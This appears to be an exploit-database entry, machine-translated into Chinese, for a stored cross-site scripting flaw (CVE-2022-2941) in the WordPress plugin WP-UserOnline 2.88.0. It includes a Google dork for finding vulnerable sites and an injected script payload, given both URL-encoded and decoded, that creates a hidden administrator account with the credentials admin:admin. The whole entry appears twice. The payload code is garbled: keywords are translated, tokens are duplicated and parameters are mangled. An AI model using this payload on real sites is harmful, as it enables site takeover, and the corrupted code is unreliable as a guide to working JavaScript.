#exploit title: WP -useronline 2.88.0-存储的跨站点脚本(XSS)(身份验证)
#Google Dork: inurl:/wp-content/plugins/wp-useronline/
#日期: 2024-06-12
#利用作者:OnurGöğebakan
#供应商homepage: https://github.com/lesterchan/wp-useronline
#软件link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
#类别: Web应用程序
#版本: 2.88.0
#测试在: WordPress 6.5.4 -Windows 10
#CVE : CVE-2022-2941
#解释:
可以使用存储的XSS漏洞将新的管理员用户添加到WordPress中。
#Exploit:
1。访问http://poc.test/wp-admin/options-general.php?page=userOnline-settings
2。单击保存并拦截请求。
3。更改'命名%5bbots%5D`参数值,有效载荷以下
````````
%3CScript%3E+函数+处理程序%28%29+%7b+var+var+nonce+%3D+this.ResponSeText.Match%28%2fname%3D%22_wpnonce_create-u Ser%22+值%3D%22%28%5CW%2B%29%29%2F%29%5B1%5D%3B+VAR+Changereq+%3D+NEW+NEW+XMLHTTPREQUEST%28%29%29%3B+Changereq.phangereq.open%27%27%27 POST%27%2C%27%2FWP-ADMIN%2fuser-new.php%27%2cTrue%29%3B+Changereq.setRequestheader%28%27content-type%27%27%2C%2C%27Applicat离子%2FX www-form-urlencoded%27%29%3b+var+params+%3D+%27Action%3DCreateuser%26_wpnonce_create-user%3D%3D%27%2BNONCE%2Bnonce%2B%27% 26_WP_HTTP_REFERER%3D%252FWP-ADMIN%252Fuser-new.php%27%2B%27%26USER_LOGIN%3DADMIN%26email%26email%3DADMIN%2540mail.com%26 first_name%3D%26LAST_NAME%3D%26url%3D%26Pass1%3DADMIN%26Pass2%3DADMIN%26pw_weak%3DON%3DON%26Role%3Dadmin%26Createuser%3 DADD%2BNEW%2Buser%27%3B+Changereq.send%28Params%29%3B+%7D+var+req+%3D+新+XMLHTTPREQUEST%28%29%29%3B+REQ.ONLOAD+%3D+手LERESPONSE%3B+REQ.open%28%27Get%27%2C+%27%2FWP-ADMIN%2Fuser-new.php%27%2C+true%29%3B+REQ.SEND%28%29%29%29%3B+%3C%3C%2FScript%3E
````````
4。用户访问http://poc.test/wp-admin/index.php?page=userOnline时执行有效载荷
5。添加了Admin:Admin凭据的管理员用户。
#解码有效载荷
````````
函数handleresponse(){
var nonce=this.responseText.match(/name='_ wpnonce_create-user'value='(\ w+)'/)'/)[1];
var changereq=new xmlhttprequest();
changereq.open('post','/wp-admin/user-new.php',true);
changereq.setRequestheader('content-type','application/x-www-form-urlencoded');
var params='action=createuser_wpnonce_create-user=' + nonce +
'_wp_http_referer=%2FWP-ADMIN%2fuser-new.php' +
'user_login=adminemail=admin%40mail.comfirst_name=last_name=url=pass1=adminpass2=adminpw_weak=onrole=abtistryatorCreateeuser=addairatorCreateuser=add+new+new+new+user';
changereq.send(params);
}
var req=new xmlhttprequest();
req.onload=handleresponse;
req.open('get','/wp-admin/user-new.php',true);
req.send();
````````
#Google Dork: inurl:/wp-content/plugins/wp-useronline/
#日期: 2024-06-12
#利用作者:OnurGöğebakan
#供应商homepage: https://github.com/lesterchan/wp-useronline
#软件link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
#类别: Web应用程序
#版本: 2.88.0
#测试在: WordPress 6.5.4 -Windows 10
#CVE : CVE-2022-2941
#解释:
可以使用存储的XSS漏洞将新的管理员用户添加到WordPress中。
#Exploit:
1。访问http://poc.test/wp-admin/options-general.php?page=userOnline-settings
2。单击保存并拦截请求。
3。更改'命名%5bbots%5D`参数值,有效载荷以下
````````
%3CScript%3E+函数+处理程序%28%29+%7b+var+var+nonce+%3D+this.ResponSeText.Match%28%2fname%3D%22_wpnonce_create-u Ser%22+值%3D%22%28%5CW%2B%29%29%2F%29%5B1%5D%3B+VAR+Changereq+%3D+NEW+NEW+XMLHTTPREQUEST%28%29%29%3B+Changereq.phangereq.open%27%27%27 POST%27%2C%27%2FWP-ADMIN%2fuser-new.php%27%2cTrue%29%3B+Changereq.setRequestheader%28%27content-type%27%27%2C%2C%27Applicat离子%2FX www-form-urlencoded%27%29%3b+var+params+%3D+%27Action%3DCreateuser%26_wpnonce_create-user%3D%3D%27%2BNONCE%2Bnonce%2B%27% 26_WP_HTTP_REFERER%3D%252FWP-ADMIN%252Fuser-new.php%27%2B%27%26USER_LOGIN%3DADMIN%26email%26email%3DADMIN%2540mail.com%26 first_name%3D%26LAST_NAME%3D%26url%3D%26Pass1%3DADMIN%26Pass2%3DADMIN%26pw_weak%3DON%3DON%26Role%3Dadmin%26Createuser%3 DADD%2BNEW%2Buser%27%3B+Changereq.send%28Params%29%3B+%7D+var+req+%3D+新+XMLHTTPREQUEST%28%29%29%3B+REQ.ONLOAD+%3D+手LERESPONSE%3B+REQ.open%28%27Get%27%2C+%27%2FWP-ADMIN%2Fuser-new.php%27%2C+true%29%3B+REQ.SEND%28%29%29%29%3B+%3C%3C%2FScript%3E
````````
4。用户访问http://poc.test/wp-admin/index.php?page=userOnline时执行有效载荷
5。添加了Admin:Admin凭据的管理员用户。
#解码有效载荷
````````
函数handleresponse(){
var nonce=this.responseText.match(/name='_ wpnonce_create-user'value='(\ w+)'/)'/)[1];
var changereq=new xmlhttprequest();
changereq.open('post','/wp-admin/user-new.php',true);
changereq.setRequestheader('content-type','application/x-www-form-urlencoded');
var params='action=createuser_wpnonce_create-user=' + nonce +
'_wp_http_referer=%2FWP-ADMIN%2fuser-new.php' +
'user_login=adminemail=admin%40mail.comfirst_name=last_name=url=pass1=adminpass2=adminpw_weak=onrole=abtistryatorCreateeuser=addairatorCreateuser=add+new+new+new+user';
changereq.send(params);
}
var req=new xmlhttprequest();
req.onload=handleresponse;
req.open('get','/wp-admin/user-new.php',true);
req.send();
````````